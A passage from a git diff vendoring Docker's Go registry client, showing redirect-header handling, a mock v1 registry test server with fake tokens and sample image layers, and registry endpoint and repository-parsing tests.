for _, trusted := range trusteds { + if hostname == trusted || strings.HasSuffix(hostname, "."+trusted) { + return true + } + } + return false +} + +// addRequiredHeadersToRedirectedRequests adds the necessary redirection headers +// for redirected requests +func addRequiredHeadersToRedirectedRequests(req *http.Request, via []*http.Request) error { + if via != nil && via[0] != nil { + if trustedLocation(req) && trustedLocation(via[0]) { + req.Header = via[0].Header + return nil + } + for k, v := range via[0].Header { + if k != "Authorization" { + for _, vv := range v { + req.Header.Add(k, vv) + } + } + } + } + return nil +} + +// NewTransport returns a new HTTP transport. If tlsConfig is nil, it uses the +// default TLS configuration. +func NewTransport(tlsConfig *tls.Config) *http.Transport { + if tlsConfig == nil { + tlsConfig = tlsconfig.ServerDefault() + } + + direct := &net.Dialer{ + Timeout: 30 * time.Second, + KeepAlive: 30 * time.Second, + DualStack: true, + } + + base := &http.Transport{ + Proxy: http.ProxyFromEnvironment, + Dial: direct.Dial, + TLSHandshakeTimeout: 10 * time.Second, + TLSClientConfig: tlsConfig, + // TODO(dmcgowan): Call close idle connections when complete and use keep alive + DisableKeepAlives: true, + } + + proxyDialer, err := sockets.DialerFromEnvironment(direct) + if err == nil { + base.Dial = proxyDialer.Dial + } + return base +} diff --git a/vendor/github.com/docker/docker/registry/registry_mock_test.go b/vendor/github.com/docker/docker/registry/registry_mock_test.go new file mode 100644 index 0000000000..21fc1fdcc7 --- /dev/null +++ b/vendor/github.com/docker/docker/registry/registry_mock_test.go @@ -0,0 +1,478 @@ +// +build !solaris + +package registry + +import ( + "encoding/json" + "errors" + "fmt" + "io" + "io/ioutil" + "net" + "net/http" + "net/http/httptest" + "net/url" + "strconv" + "strings" + "testing" + "time" + + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/reference" + "github.com/gorilla/mux" + + "github.com/Sirupsen/logrus" +) + +var ( + testHTTPServer *httptest.Server + testHTTPSServer *httptest.Server + testLayers = map[string]map[string]string{ + "77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20": { + "json": `{"id":"77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20", + "comment":"test base image","created":"2013-03-23T12:53:11.10432-07:00", + "container_config":{"Hostname":"","User":"","Memory":0,"MemorySwap":0, + "CpuShares":0,"AttachStdin":false,"AttachStdout":false,"AttachStderr":false, + "Tty":false,"OpenStdin":false,"StdinOnce":false, + "Env":null,"Cmd":null,"Dns":null,"Image":"","Volumes":null, + "VolumesFrom":"","Entrypoint":null},"Size":424242}`, + "checksum_simple": "sha256:1ac330d56e05eef6d438586545ceff7550d3bdcb6b19961f12c5ba714ee1bb37", + "checksum_tarsum": "tarsum+sha256:4409a0685741ca86d38df878ed6f8cbba4c99de5dc73cd71aef04be3bb70be7c", + "ancestry": `["77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20"]`, + "layer": string([]byte{ + 0x1f, 0x8b, 0x08, 0x08, 0x0e, 0xb0, 0xee, 0x51, 0x02, 0x03, 0x6c, 0x61, 0x79, 0x65, + 0x72, 0x2e, 0x74, 0x61, 0x72, 0x00, 0xed, 0xd2, 0x31, 0x0e, 0xc2, 0x30, 0x0c, 0x05, + 0x50, 0xcf, 0x9c, 0xc2, 0x27, 0x48, 0xed, 0x38, 0x4e, 0xce, 0x13, 0x44, 0x2b, 0x66, + 0x62, 0x24, 0x8e, 0x4f, 0xa0, 0x15, 0x63, 0xb6, 0x20, 0x21, 0xfc, 0x96, 0xbf, 0x78, + 0xb0, 0xf5, 0x1d, 0x16, 0x98, 0x8e, 0x88, 0x8a, 0x2a, 0xbe, 0x33, 0xef, 0x49, 0x31, + 0xed, 0x79, 0x40, 0x8e, 0x5c, 0x44, 0x85, 0x88, 0x33, 0x12, 0x73, 0x2c, 0x02, 0xa8, + 0xf0, 0x05, 0xf7, 0x66, 0xf5, 0xd6, 0x57, 0x69, 0xd7, 0x7a, 0x19, 0xcd, 0xf5, 0xb1, + 0x6d, 0x1b, 0x1f, 0xf9, 0xba, 0xe3, 0x93, 0x3f, 0x22, 0x2c, 0xb6, 0x36, 0x0b, 0xf6, + 0xb0, 0xa9, 0xfd, 0xe7, 0x94, 0x46, 0xfd, 0xeb, 0xd1, 0x7f, 0x2c, 0xc4, 0xd2, 0xfb, + 0x97, 0xfe, 0x02, 0x80, 0xe4, 0xfd, 0x4f, 0x77, 0xae, 0x6d, 0x3d, 0x81, 0x73, 0xce, + 0xb9, 0x7f, 0xf3, 0x04, 0x41, 0xc1, 0xab, 0xc6, 0x00, 0x0a, 0x00, 0x00, + }), + }, + "42d718c941f5c532ac049bf0b0ab53f0062f09a03afd4aa4a02c098e46032b9d": { + "json": `{"id":"42d718c941f5c532ac049bf0b0ab53f0062f09a03afd4aa4a02c098e46032b9d", + "parent":"77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20", + "comment":"test base image","created":"2013-03-23T12:55:11.10432-07:00", + "container_config":{"Hostname":"","User":"","Memory":0,"MemorySwap":0, + "CpuShares":0,"AttachStdin":false,"AttachStdout":false,"AttachStderr":false, + "Tty":false,"OpenStdin":false,"StdinOnce":false, + "Env":null,"Cmd":null,"Dns":null,"Image":"","Volumes":null, + "VolumesFrom":"","Entrypoint":null},"Size":424242}`, + "checksum_simple": "sha256:bea7bf2e4bacd479344b737328db47b18880d09096e6674165533aa994f5e9f2", + "checksum_tarsum": "tarsum+sha256:68fdb56fb364f074eec2c9b3f85ca175329c4dcabc4a6a452b7272aa613a07a2", + "ancestry": `["42d718c941f5c532ac049bf0b0ab53f0062f09a03afd4aa4a02c098e46032b9d", + "77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20"]`, + "layer": string([]byte{ + 0x1f, 0x8b, 0x08, 0x08, 0xbd, 0xb3, 0xee, 0x51, 0x02, 0x03, 0x6c, 0x61, 0x79, 0x65, + 0x72, 0x2e, 0x74, 0x61, 0x72, 0x00, 0xed, 0xd1, 0x31, 0x0e, 0xc2, 0x30, 0x0c, 0x05, + 0x50, 0xcf, 0x9c, 0xc2, 0x27, 0x48, 0x9d, 0x38, 0x8e, 0xcf, 0x53, 0x51, 0xaa, 0x56, + 0xea, 0x44, 0x82, 0xc4, 0xf1, 0x09, 0xb4, 0xea, 0x98, 0x2d, 0x48, 0x08, 0xbf, 0xe5, + 0x2f, 0x1e, 0xfc, 0xf5, 0xdd, 0x00, 0xdd, 0x11, 0x91, 0x8a, 0xe0, 0x27, 0xd3, 0x9e, + 0x14, 0xe2, 0x9e, 0x07, 0xf4, 0xc1, 0x2b, 0x0b, 0xfb, 0xa4, 0x82, 0xe4, 0x3d, 0x93, + 0x02, 0x0a, 0x7c, 0xc1, 0x23, 0x97, 0xf1, 0x5e, 0x5f, 0xc9, 0xcb, 0x38, 0xb5, 0xee, + 0xea, 0xd9, 0x3c, 0xb7, 0x4b, 0xbe, 0x7b, 0x9c, 0xf9, 0x23, 0xdc, 0x50, 0x6e, 0xb9, + 0xb8, 0xf2, 0x2c, 0x5d, 0xf7, 0x4f, 0x31, 0xb6, 0xf6, 0x4f, 0xc7, 0xfe, 0x41, 0x55, + 0x63, 0xdd, 0x9f, 0x89, 0x09, 0x90, 0x6c, 0xff, 0xee, 0xae, 0xcb, 0xba, 0x4d, 0x17, + 0x30, 0xc6, 0x18, 0xf3, 0x67, 0x5e, 0xc1, 0xed, 0x21, 0x5d, 0x00, 0x0a, 0x00, 0x00, + }), + }, + } + testRepositories = map[string]map[string]string{ + "foo42/bar": { + "latest": "42d718c941f5c532ac049bf0b0ab53f0062f09a03afd4aa4a02c098e46032b9d", + "test": "42d718c941f5c532ac049bf0b0ab53f0062f09a03afd4aa4a02c098e46032b9d", + }, + } + mockHosts = map[string][]net.IP{ + "": {net.ParseIP("0.0.0.0")}, + "localhost": {net.ParseIP("127.0.0.1"), net.ParseIP("::1")}, + "example.com": {net.ParseIP("42.42.42.42")}, + "other.com": {net.ParseIP("43.43.43.43")}, + } +) + +func init() { + r := mux.NewRouter() + + // /v1/ + r.HandleFunc("/v1/_ping", handlerGetPing).Methods("GET") + r.HandleFunc("/v1/images/{image_id:[^/]+}/{action:json|layer|ancestry}", handlerGetImage).Methods("GET") + r.HandleFunc("/v1/images/{image_id:[^/]+}/{action:json|layer|checksum}", handlerPutImage).Methods("PUT") + r.HandleFunc("/v1/repositories/{repository:.+}/tags", handlerGetDeleteTags).Methods("GET", "DELETE") + r.HandleFunc("/v1/repositories/{repository:.+}/tags/{tag:.+}", handlerGetTag).Methods("GET") + r.HandleFunc("/v1/repositories/{repository:.+}/tags/{tag:.+}", handlerPutTag).Methods("PUT") + r.HandleFunc("/v1/users{null:.*}", handlerUsers).Methods("GET", "POST", "PUT") + r.HandleFunc("/v1/repositories/{repository:.+}{action:/images|/}", handlerImages).Methods("GET", "PUT", "DELETE") + r.HandleFunc("/v1/repositories/{repository:.+}/auth", handlerAuth).Methods("PUT") + r.HandleFunc("/v1/search", handlerSearch).Methods("GET") + + // /v2/ + r.HandleFunc("/v2/version", handlerGetPing).Methods("GET") + + testHTTPServer = httptest.NewServer(handlerAccessLog(r)) + testHTTPSServer = httptest.NewTLSServer(handlerAccessLog(r)) + + // override net.LookupIP + lookupIP = func(host string) ([]net.IP, error) { + if host == "127.0.0.1" { + // I believe in future Go versions this will fail, so let's fix it later + return net.LookupIP(host) + } + for h, addrs := range mockHosts { + if host == h { + return addrs, nil + } + for _, addr := range addrs { + if addr.String() == host { + return []net.IP{addr}, nil + } + } + } + return nil, errors.New("lookup: no such host") + } +} + +func handlerAccessLog(handler http.Handler) http.Handler { + logHandler := func(w http.ResponseWriter, r *http.Request) { + logrus.Debugf("%s \"%s %s\"", r.RemoteAddr, r.Method, r.URL) + handler.ServeHTTP(w, r) + } + return http.HandlerFunc(logHandler) +} + +func makeURL(req string) string { + return testHTTPServer.URL + req +} + +func makeHTTPSURL(req string) string { + return testHTTPSServer.URL + req +} + +func makeIndex(req string) *registrytypes.IndexInfo { + index := ®istrytypes.IndexInfo{ + Name: makeURL(req), + } + return index +} + +func makeHTTPSIndex(req string) *registrytypes.IndexInfo { + index := ®istrytypes.IndexInfo{ + Name: makeHTTPSURL(req), + } + return index +} + +func makePublicIndex() *registrytypes.IndexInfo { + index := ®istrytypes.IndexInfo{ + Name: IndexServer, + Secure: true, + Official: true, + } + return index +} + +func makeServiceConfig(mirrors []string, insecureRegistries []string) *serviceConfig { + options := ServiceOptions{ + Mirrors: mirrors, + InsecureRegistries: insecureRegistries, + } + + return newServiceConfig(options) +} + +func writeHeaders(w http.ResponseWriter) { + h := w.Header() + h.Add("Server", "docker-tests/mock") + h.Add("Expires", "-1") + h.Add("Content-Type", "application/json") + h.Add("Pragma", "no-cache") + h.Add("Cache-Control", "no-cache") + h.Add("X-Docker-Registry-Version", "0.0.0") + h.Add("X-Docker-Registry-Config", "mock") +} + +func writeResponse(w http.ResponseWriter, message interface{}, code int) { + writeHeaders(w) + w.WriteHeader(code) + body, err := json.Marshal(message) + if err != nil { + io.WriteString(w, err.Error()) + return + } + w.Write(body) +} + +func readJSON(r *http.Request, dest interface{}) error { + body, err := ioutil.ReadAll(r.Body) + if err != nil { + return err + } + return json.Unmarshal(body, dest) +} + +func apiError(w http.ResponseWriter, message string, code int) { + body := map[string]string{ + "error": message, + } + writeResponse(w, body, code) +} + +func assertEqual(t *testing.T, a interface{}, b interface{}, message string) { + if a == b { + return + } + if len(message) == 0 { + message = fmt.Sprintf("%v != %v", a, b) + } + t.Fatal(message) +} + +func assertNotEqual(t *testing.T, a interface{}, b interface{}, message string) { + if a != b { + return + } + if len(message) == 0 { + message = fmt.Sprintf("%v == %v", a, b) + } + t.Fatal(message) +} + +// Similar to assertEqual, but does not stop test +func checkEqual(t *testing.T, a interface{}, b interface{}, messagePrefix string) { + if a == b { + return + } + message := fmt.Sprintf("%v != %v", a, b) + if len(messagePrefix) != 0 { + message = messagePrefix + ": " + message + } + t.Error(message) +} + +// Similar to assertNotEqual, but does not stop test +func checkNotEqual(t *testing.T, a interface{}, b interface{}, messagePrefix string) { + if a != b { + return + } + message := fmt.Sprintf("%v == %v", a, b) + if len(messagePrefix) != 0 { + message = messagePrefix + ": " + message + } + t.Error(message) +} + +func requiresAuth(w http.ResponseWriter, r *http.Request) bool { + writeCookie := func() { + value := fmt.Sprintf("FAKE-SESSION-%d", time.Now().UnixNano()) + cookie := &http.Cookie{Name: "session", Value: value, MaxAge: 3600} + http.SetCookie(w, cookie) + //FIXME(sam): this should be sent only on Index routes + value = fmt.Sprintf("FAKE-TOKEN-%d", time.Now().UnixNano()) + w.Header().Add("X-Docker-Token", value) + } + if len(r.Cookies()) > 0 { + writeCookie() + return true + } + if len(r.Header.Get("Authorization")) > 0 { + writeCookie() + return true + } + w.Header().Add("WWW-Authenticate", "token") + apiError(w, "Wrong auth", 401) + return false +} + +func handlerGetPing(w http.ResponseWriter, r *http.Request) { + writeResponse(w, true, 200) +} + +func handlerGetImage(w http.ResponseWriter, r *http.Request) { + if !requiresAuth(w, r) { + return + } + vars := mux.Vars(r) + layer, exists := testLayers[vars["image_id"]] + if !exists { + http.NotFound(w, r) + return + } + writeHeaders(w) + layerSize := len(layer["layer"]) + w.Header().Add("X-Docker-Size", strconv.Itoa(layerSize)) + io.WriteString(w, layer[vars["action"]]) +} + +func handlerPutImage(w http.ResponseWriter, r *http.Request) { + if !requiresAuth(w, r) { + return + } + vars := mux.Vars(r) + imageID := vars["image_id"] + action := vars["action"] + layer, exists := testLayers[imageID] + if !exists { + if action != "json" { + http.NotFound(w, r) + return + } + layer = make(map[string]string) + testLayers[imageID] = layer + } + if checksum := r.Header.Get("X-Docker-Checksum"); checksum != "" { + if checksum != layer["checksum_simple"] && checksum != layer["checksum_tarsum"] { + apiError(w, "Wrong checksum", 400) + return + } + } + body, err := ioutil.ReadAll(r.Body) + if err != nil { + apiError(w, fmt.Sprintf("Error: %s", err), 500) + return + } + layer[action] = string(body) + writeResponse(w, true, 200) +} + +func handlerGetDeleteTags(w http.ResponseWriter, r *http.Request) { + if !requiresAuth(w, r) { + return + } + repositoryName, err := reference.WithName(mux.Vars(r)["repository"]) + if err != nil { + apiError(w, "Could not parse repository", 400) + return + } + tags, exists := testRepositories[repositoryName.String()] + if !exists { + apiError(w, "Repository not found", 404) + return + } + if r.Method == "DELETE" { + delete(testRepositories, repositoryName.String()) + writeResponse(w, true, 200) + return + } + writeResponse(w, tags, 200) +} + +func handlerGetTag(w http.ResponseWriter, r *http.Request) { + if !requiresAuth(w, r) { + return + } + vars := mux.Vars(r) + repositoryName, err := reference.WithName(vars["repository"]) + if err != nil { + apiError(w, "Could not parse repository", 400) + return + } + tagName := vars["tag"] + tags, exists := testRepositories[repositoryName.String()] + if !exists { + apiError(w, "Repository not found", 404) + return + } + tag, exists := tags[tagName] + if !exists { + apiError(w, "Tag not found", 404) + return + } + writeResponse(w, tag, 200) +} + +func handlerPutTag(w http.ResponseWriter, r *http.Request) { + if !requiresAuth(w, r) { + return + } + vars := mux.Vars(r) + repositoryName, err := reference.WithName(vars["repository"]) + if err != nil { + apiError(w, "Could not parse repository", 400) + return + } + tagName := vars["tag"] + tags, exists := testRepositories[repositoryName.String()] + if !exists { + tags = make(map[string]string) + testRepositories[repositoryName.String()] = tags + } + tagValue := "" + readJSON(r, tagValue) + tags[tagName] = tagValue + writeResponse(w, true, 200) +} + +func handlerUsers(w http.ResponseWriter, r *http.Request) { + code := 200 + if r.Method == "POST" { + code = 201 + } else if r.Method == "PUT" { + code = 204 + } + writeResponse(w, "", code) +} + +func handlerImages(w http.ResponseWriter, r *http.Request) { + u, _ := url.Parse(testHTTPServer.URL) + w.Header().Add("X-Docker-Endpoints", fmt.Sprintf("%s , %s ", u.Host, "test.example.com")) + w.Header().Add("X-Docker-Token", fmt.Sprintf("FAKE-SESSION-%d", time.Now().UnixNano())) + if r.Method == "PUT" { + if strings.HasSuffix(r.URL.Path, "images") { + writeResponse(w, "", 204) + return + } + writeResponse(w, "", 200) + return + } + if r.Method == "DELETE" { + writeResponse(w, "", 204) + return + } + images := []map[string]string{} + for imageID, layer := range testLayers { + image := make(map[string]string) + image["id"] = imageID + image["checksum"] = layer["checksum_tarsum"] + image["Tag"] = "latest" + images = append(images, image) + } + writeResponse(w, images, 200) +} + +func handlerAuth(w http.ResponseWriter, r *http.Request) { + writeResponse(w, "OK", 200) +} + +func handlerSearch(w http.ResponseWriter, r *http.Request) { + result := ®istrytypes.SearchResults{ + Query: "fakequery", + NumResults: 1, + Results: []registrytypes.SearchResult{{Name: "fakeimage", StarCount: 42}}, + } + writeResponse(w, result, 200) +} + +func TestPing(t *testing.T) { + res, err := http.Get(makeURL("/v1/_ping")) + if err != nil { + t.Fatal(err) + } + assertEqual(t, res.StatusCode, 200, "") + assertEqual(t, res.Header.Get("X-Docker-Registry-Config"), "mock", + "This is not a Mocked Registry") +} + +/* Uncomment this to test Mocked Registry locally with curl + * WARNING: Don't push on the repos uncommented, it'll block the tests + * +func TestWait(t *testing.T) { + logrus.Println("Test HTTP server ready and waiting:", testHTTPServer.URL) + c := make(chan int) + <-c +} + +//*/ diff --git a/vendor/github.com/docker/docker/registry/registry_test.go b/vendor/github.com/docker/docker/registry/registry_test.go new file mode 100644 index 0000000000..786dfbed40 --- /dev/null +++ b/vendor/github.com/docker/docker/registry/registry_test.go @@ -0,0 +1,875 @@ +// +build !solaris + +package registry + +import ( + "fmt" + "net/http" + "net/http/httputil" + "net/url" + "strings" + "testing" + + "github.com/docker/distribution/registry/client/transport" + "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/reference" +) + +var ( + token = []string{"fake-token"} +) + +const ( + imageID = "42d718c941f5c532ac049bf0b0ab53f0062f09a03afd4aa4a02c098e46032b9d" + REPO = "foo42/bar" +) + +func spawnTestRegistrySession(t *testing.T) *Session { + authConfig := &types.AuthConfig{} + endpoint, err := NewV1Endpoint(makeIndex("/v1/"), "", nil) + if err != nil { + t.Fatal(err) + } + userAgent := "docker test client" + var tr http.RoundTripper = debugTransport{NewTransport(nil), t.Log} + tr = transport.NewTransport(AuthTransport(tr, authConfig, false), DockerHeaders(userAgent, nil)...) + client := HTTPClient(tr) + r, err := NewSession(client, authConfig, endpoint) + if err != nil { + t.Fatal(err) + } + // In a normal scenario for the v1 registry, the client should send a `X-Docker-Token: true` + // header while authenticating, in order to retrieve a token that can be later used to + // perform authenticated actions. + // + // The mock v1 registry does not support that, (TODO(tiborvass): support it), instead, + // it will consider authenticated any request with the header `X-Docker-Token: fake-token`. + // + // Because we know that the client's transport is an `*authTransport` we simply cast it, + // in order to set the internal cached token to the fake token, and thus send that fake token + // upon every subsequent requests. + r.client.Transport.(*authTransport).token = token + return r +} + +func TestPingRegistryEndpoint(t *testing.T) { + testPing := func(index *registrytypes.IndexInfo, expectedStandalone bool, assertMessage string) { + ep, err := NewV1Endpoint(index, "", nil) + if err != nil { + t.Fatal(err) + } + regInfo, err := ep.Ping() + if err != nil { + t.Fatal(err) + } + + assertEqual(t, regInfo.Standalone, expectedStandalone, assertMessage) + } + + testPing(makeIndex("/v1/"), true, "Expected standalone to be true (default)") + testPing(makeHTTPSIndex("/v1/"), true, "Expected standalone to be true (default)") + testPing(makePublicIndex(), false, "Expected standalone to be false for public index") +} + +func TestEndpoint(t *testing.T) { + // Simple wrapper to fail test if err != nil + expandEndpoint := func(index *registrytypes.IndexInfo) *V1Endpoint { + endpoint, err := NewV1Endpoint(index, "", nil) + if err != nil { + t.Fatal(err) + } + return endpoint + } + + assertInsecureIndex := func(index *registrytypes.IndexInfo) { + index.Secure = true + _, err := NewV1Endpoint(index, "", nil) + assertNotEqual(t, err, nil, index.Name+": Expected error for insecure index") + assertEqual(t, strings.Contains(err.Error(), "insecure-registry"), true, index.Name+": Expected insecure-registry error for insecure index") + index.Secure = false + } + + assertSecureIndex := func(index *registrytypes.IndexInfo) { + index.Secure = true + _, err := NewV1Endpoint(index, "", nil) + assertNotEqual(t, err, nil, index.Name+": Expected cert error for secure index") + assertEqual(t, strings.Contains(err.Error(), "certificate signed by unknown authority"), true, index.Name+": Expected cert error for secure index") + index.Secure = false + } + + index := ®istrytypes.IndexInfo{} + index.Name = makeURL("/v1/") + endpoint := expandEndpoint(index) + assertEqual(t, endpoint.String(), index.Name, "Expected endpoint to be "+index.Name) + assertInsecureIndex(index) + + index.Name = makeURL("") + endpoint = expandEndpoint(index) + assertEqual(t, endpoint.String(), index.Name+"/v1/", index.Name+": Expected endpoint to be "+index.Name+"/v1/") + assertInsecureIndex(index) + + httpURL := makeURL("") + index.Name = strings.SplitN(httpURL, "://", 2)[1] + endpoint = expandEndpoint(index) + assertEqual(t, endpoint.String(), httpURL+"/v1/", index.Name+": Expected endpoint to be "+httpURL+"/v1/") + assertInsecureIndex(index) + + index.Name = makeHTTPSURL("/v1/") + endpoint = expandEndpoint(index) + assertEqual(t, endpoint.String(), index.Name, "Expected endpoint to be "+index.Name) + assertSecureIndex(index) + + index.Name = makeHTTPSURL("") + endpoint = expandEndpoint(index) + assertEqual(t, endpoint.String(), index.Name+"/v1/", index.Name+": Expected endpoint to be "+index.Name+"/v1/") + assertSecureIndex(index) + + httpsURL := makeHTTPSURL("") + index.Name = strings.SplitN(httpsURL, "://", 2)[1] + endpoint = expandEndpoint(index) + assertEqual(t, endpoint.String(), httpsURL+"/v1/", index.Name+": Expected endpoint to be "+httpsURL+"/v1/") + assertSecureIndex(index) + + badEndpoints := []string{ + "http://127.0.0.1/v1/", + "https://127.0.0.1/v1/", + "http://127.0.0.1", + "https://127.0.0.1", + "127.0.0.1", + } + for _, address := range badEndpoints { + index.Name = address + _, err := NewV1Endpoint(index, "", nil) + checkNotEqual(t, err, nil, "Expected error while expanding bad endpoint") + } +} + +func TestGetRemoteHistory(t *testing.T) { + r := spawnTestRegistrySession(t) + hist, err := r.GetRemoteHistory(imageID, makeURL("/v1/")) + if err != nil { + t.Fatal(err) + } + assertEqual(t, len(hist), 2, "Expected 2 images in history") + assertEqual(t, hist[0], imageID, "Expected "+imageID+"as first ancestry") + assertEqual(t, hist[1], "77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20", + "Unexpected second ancestry") +} + +func TestLookupRemoteImage(t *testing.T) { + r := spawnTestRegistrySession(t) + err := r.LookupRemoteImage(imageID, makeURL("/v1/")) + assertEqual(t, err, nil, "Expected error of remote lookup to nil") + if err := r.LookupRemoteImage("abcdef", makeURL("/v1/")); err == nil { + t.Fatal("Expected error of remote lookup to not nil") + } +} + +func TestGetRemoteImageJSON(t *testing.T) { + r := spawnTestRegistrySession(t) + json, size, err := r.GetRemoteImageJSON(imageID, makeURL("/v1/")) + if err != nil { + t.Fatal(err) + } + assertEqual(t, size, int64(154), "Expected size 154") + if len(json) == 0 { + t.Fatal("Expected non-empty json") + } + + _, _, err = r.GetRemoteImageJSON("abcdef", makeURL("/v1/")) + if err == nil { + t.Fatal("Expected image not found error") + } +} + +func TestGetRemoteImageLayer(t *testing.T) { + r := spawnTestRegistrySession(t) + data, err := r.GetRemoteImageLayer(imageID, makeURL("/v1/"), 0) + if err != nil { + t.Fatal(err) + } + if data == nil { + t.Fatal("Expected non-nil data result") + } + + _, err = r.GetRemoteImageLayer("abcdef", makeURL("/v1/"), 0) + if err == nil { + t.Fatal("Expected image not found error") + } +} + +func TestGetRemoteTag(t *testing.T) { + r := spawnTestRegistrySession(t) + repoRef, err := reference.ParseNamed(REPO) + if err != nil { + t.Fatal(err) + } + tag, err := r.GetRemoteTag([]string{makeURL("/v1/")}, repoRef, "test") + if err != nil { + t.Fatal(err) + } + assertEqual(t, tag, imageID, "Expected tag test to map to "+imageID) + + bazRef, err := reference.ParseNamed("foo42/baz") + if err != nil { + t.Fatal(err) + } + _, err = r.GetRemoteTag([]string{makeURL("/v1/")}, bazRef, "foo") + if err != ErrRepoNotFound { + t.Fatal("Expected ErrRepoNotFound error when fetching tag for bogus repo") + } +} + +func TestGetRemoteTags(t *testing.T) { + r := spawnTestRegistrySession(t) + repoRef, err := reference.ParseNamed(REPO) + if err != nil { + t.Fatal(err) + } + tags, err := r.GetRemoteTags([]string{makeURL("/v1/")}, repoRef) + if err != nil { + t.Fatal(err) + } + assertEqual(t, len(tags), 2, "Expected two tags") + assertEqual(t, tags["latest"], imageID, "Expected tag latest to map to "+imageID) + assertEqual(t, tags["test"], imageID, "Expected tag test to map to "+imageID) + + bazRef, err := reference.ParseNamed("foo42/baz") + if err != nil { + t.Fatal(err) + } + _, err = r.GetRemoteTags([]string{makeURL("/v1/")}, bazRef) + if err != ErrRepoNotFound { + t.Fatal("Expected ErrRepoNotFound error when fetching tags for bogus repo") + } +} + +func TestGetRepositoryData(t *testing.T) { + r := spawnTestRegistrySession(t) + parsedURL, err := url.Parse(makeURL("/v1/")) + if err != nil { + t.Fatal(err) + } + host := "http://" + parsedURL.Host + "/v1/" + repoRef, err := reference.ParseNamed(REPO) + if err != nil { + t.Fatal(err) + } + data, err := r.GetRepositoryData(repoRef) + if err != nil { + t.Fatal(err) + } + assertEqual(t, len(data.ImgList), 2, "Expected 2 images in ImgList") + assertEqual(t, len(data.Endpoints), 2, + fmt.Sprintf("Expected 2 endpoints in Endpoints, found %d instead", len(data.Endpoints))) + assertEqual(t, data.Endpoints[0], host, + fmt.Sprintf("Expected first endpoint to be %s but found %s instead", host, data.Endpoints[0])) + assertEqual(t, data.Endpoints[1], "http://test.example.com/v1/", + fmt.Sprintf("Expected first endpoint to be http://test.example.com/v1/ but found %s instead", data.Endpoints[1])) + +} + +func TestPushImageJSONRegistry(t *testing.T) { + r := spawnTestRegistrySession(t) + imgData := &ImgData{ + ID: "77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20", + Checksum: "sha256:1ac330d56e05eef6d438586545ceff7550d3bdcb6b19961f12c5ba714ee1bb37", + } + + err := r.PushImageJSONRegistry(imgData, []byte{0x42, 0xdf, 0x0}, makeURL("/v1/")) + if err != nil { + t.Fatal(err) + } +} + +func TestPushImageLayerRegistry(t *testing.T) { + r := spawnTestRegistrySession(t) + layer := strings.NewReader("") + _, _, err := r.PushImageLayerRegistry(imageID, layer, makeURL("/v1/"), []byte{}) + if err != nil { + t.Fatal(err) + } +} + +func TestParseRepositoryInfo(t *testing.T) { + type staticRepositoryInfo struct { + Index *registrytypes.IndexInfo + RemoteName string + CanonicalName string + LocalName string + Official bool + } + + expectedRepoInfos := map[string]staticRepositoryInfo{ + "fooo/bar": { + Index: ®istrytypes.IndexInfo{ + Name: IndexName, + Official: true, + }, + RemoteName: "fooo/bar", + LocalName: "fooo/bar", + CanonicalName: "docker.io/fooo/bar", + Official: false, + }, + "library/ubuntu": { + Index: ®istrytypes.IndexInfo{ + Name: IndexName, + Official: true, + }, + RemoteName: "library/ubuntu", + LocalName: "ubuntu", + CanonicalName: "docker.io/library/ubuntu", + Official: true, + }, + "nonlibrary/ubuntu": { + Index: ®istrytypes.IndexInfo{ + Name: IndexName, + Official: true, + }, + RemoteName: "nonlibrary/ubuntu", + LocalName: "nonlibrary/ubuntu", + CanonicalName: "docker.io/nonlibrary/ubuntu", + Official: false, + }, + "ubuntu": { + Index: ®istrytypes.IndexInfo{ + Name: IndexName, + Official: true, + }, + RemoteName: "library/ubuntu", + LocalName: "ubuntu", + CanonicalName: "docker.io/library/ubuntu", + Official: true, + }, + "other/library": { + Index: ®istrytypes.IndexInfo{ + Name: IndexName, + Official: true, + }, + RemoteName: "other/library", + LocalName: "other/library", + CanonicalName: "docker.io/other/library", + Official: false, + }, + "127.0.0.1:8000/private/moonbase": { + Index: ®istrytypes.IndexInfo{ + Name: "127.0.0.1:8000", + Official: false, + }, + RemoteName: "private/moonbase", + LocalName: "127.0.0.1:8000/private/moonbase", + CanonicalName: "127.0.0.1:8000/private/moonbase", + Official: false, + }, + "127.0.0.1:8000/privatebase": { + Index: ®istrytypes.IndexInfo{ + Name: "127.0.0.1:8000", + Official: false, + }, + RemoteName: "privatebase", + LocalName: "127.0.0.1:8000/privatebase", + CanonicalName: "127.0.0.1:8000/privatebase", + Official: false, + }, + "localhost:8000/private/moonbase": { + Index: ®istrytypes.IndexInfo{ + Name: "localhost:8000", + Official: false, + }, + RemoteName: "private/moonbase", + LocalName: "localhost:8000/private/moonbase", + CanonicalName: "localhost:8000/private/moonbase", + Official: false, + }, + "localhost:8000/privatebase": { + Index: ®istrytypes.IndexInfo{ + Name: "localhost:8000", + Official: false, + }, + RemoteName: "privatebase", + LocalName: "localhost:8000/privatebase", + CanonicalName: "localhost:8000/privatebase", + Official: false, + }, + "example.com/private/moonbase": { + Index: ®istrytypes.IndexInfo{ + Name: "example.com", + Official: false, + }, + RemoteName: "private/moonbase", + LocalName: "example.com/private/moonbase", + CanonicalName: "example.com/private/moonbase", + Official: false, + }, + "example.com/privatebase": { + Index: ®istrytypes.IndexInfo{ + Name: "example.com", + Official: false, + }, + RemoteName: "privatebase", + LocalName: "example.com/privatebase", + CanonicalName: "example.com/privatebase", + Official: false, + }, + "example.com:8000/private/moonbase": { + Index: ®istrytypes.IndexInfo{ + Name: "example.com:8000", + Official: false, + }, + RemoteName: "private/moonbase", + LocalName: "example.com:8000/private/moonbase", + CanonicalName: "example.com:8000/private/moonbase", + Official: false, + }, + "example.com:8000/privatebase": { + Index: ®istrytypes.IndexInfo{ + Name: "example.com:8000", + Official: false, + }, + RemoteName: "privatebase", + LocalName: "example.com:8000/privatebase", + CanonicalName: "example.com:8000/privatebase", + Official: false, + }, + "localhost/private/moonbase": { + Index: ®istrytypes.IndexInfo{ + Name: "localhost", + Official: false, + }, + RemoteName: "private/moonbase", + LocalName: 